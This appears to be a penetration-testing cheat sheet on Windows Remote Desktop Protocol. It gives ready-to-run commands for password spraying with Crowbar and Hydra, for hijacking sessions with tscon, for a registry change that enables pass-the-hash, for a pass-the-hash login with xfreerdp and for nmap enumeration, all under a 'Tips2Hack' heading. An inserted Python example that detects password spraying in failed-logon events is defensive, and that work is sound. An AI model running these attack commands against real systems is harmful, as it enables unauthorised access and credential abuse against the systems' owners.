RDP

ABOUT

Remote Desktop Protocol (RDP) is a protocol developed by Microsoft for remote access to a computer running the Windows OS. It carries the display output and control commands of the GUI, encrypted, over IP networks. It works at the Application Layer of the TCP/IP model, typically on port TCP/3389. If Network Address Translation (NAT) is used on the route between client and server, as is often the case with Internet connections, the remote computer needs the public IP address to reach the server. RDP uses TLS/SSL.

Connecting

Rdesktop

rdesktop -u carni17 -p 'amogus' -d domain.kek 13.13.13.13

Xfreerdp

xfreerdp /u:carni17 /p:amogus /v:13.13.13.13 /d:domain.kek /cert:ignore
# Connect with port-forwarding
xfreerdp /u:carni17 /p:amogus /v:localhost:3389 /d:domain.kek /cert:ignore

Remmina (GUI)

remmina

Password Spraying

Crowbar

crowbar -b rdp -s 13.13.13.13/32 -U users.txt -c 'amogus'

Hydra

hydra -L users.txt -p 'amogus' 13.13.13.13 rdp
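
Seen from the defending side, both tools above leave the same trace: one source address failing logons for many different accounts in a short time. The following is an added example, not part of the original page, that flags this pattern. It assumes Security event 4625 records already parsed into dicts with the hypothetical keys `time`, `ip`, `user`, `event_id` and `logon_type`; the thresholds and the sample events are constructed.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Failed RDP logons show up in event 4625 with logon type 3 (network,
# when NLA is enabled) or 10 (RemoteInteractive).
RDP_LOGON_TYPES = {3, 10}

def detect_spray(events, min_users=5, window=timedelta(minutes=10)):
    """Return {source_ip: sorted usernames} for sources that failed logons
    for at least `min_users` distinct accounts inside a sliding `window`."""
    recent = defaultdict(deque)   # ip -> (time, user) pairs still in window
    flagged = {}
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["event_id"] != 4625 or ev["logon_type"] not in RDP_LOGON_TYPES:
            continue
        q = recent[ev["ip"]]
        q.append((ev["time"], ev["user"].lower()))
        while q and ev["time"] - q[0][0] > window:
            q.popleft()               # drop failures older than the window
        users = {u for _, u in q}
        if len(users) >= min_users:   # many accounts, one source: spray
            flagged.setdefault(ev["ip"], set()).update(users)
    return {ip: sorted(u) for ip, u in flagged.items()}

def _ev(time, ip, user, event_id=4625, logon_type=3):
    # Helper that builds one constructed event record.
    return {"time": time, "ip": ip, "user": user,
            "event_id": event_id, "logon_type": logon_type}

# Constructed sample events (documentation address range 192.0.2.0/24).
T0 = datetime(2024, 1, 1, 10, 0, 0)
SAMPLE = (
    # One source, six accounts, ten seconds apart: spray pattern.
    [_ev(T0 + timedelta(seconds=10 * i), "192.0.2.50", u)
     for i, u in enumerate(["alice", "bob", "carol", "dave", "erin", "frank"])]
    # One source hammering a single account: not a spray.
    + [_ev(T0 + timedelta(seconds=5 * i), "192.0.2.77", "alice")
       for i in range(8)]
    # Five accounts, but one failure per hour: never inside one window.
    + [_ev(T0 + timedelta(hours=i), "192.0.2.88", u)
       for i, u in enumerate(["alice", "bob", "carol", "dave", "erin"])]
)

if __name__ == "__main__":
    print(detect_spray(SAMPLE))
```

Counting distinct accounts per source, rather than total failures, is what separates a spray from a single user mistyping a password.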

Session Hijacking

We need SYSTEM privileges and use tscon.exe (which allows connecting to another desktop session) [LINK]

tscon 13 /dest:CARN3

Pass-The-Hash

By default, Restricted Admin Mode is disabled on Windows, and we need to enable it by adding the DisableRestrictedAdmin registry value:

reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

Then use xfreerdp to pass the hash:

xfreerdp /v:13.13.13.13 /u:carni17 /pth:12379NSKDFKSJDF20931C031

Tips2Hack

  1. Nmap RDP Scan

nmap -sV -sC 13.13.13.13 -p3389 --script "rdp*"
  2. RDP Security Check [LINK]

./rdp-sec-check.pl 13.13.13.13
  3. Initiate an RDP Session via xfreerdp (or Remmina with GUI)

xfreerdp /u:carni17 /p:"amogus" /v:13.13.13.13 /cert:ignore /d:DOMAIN
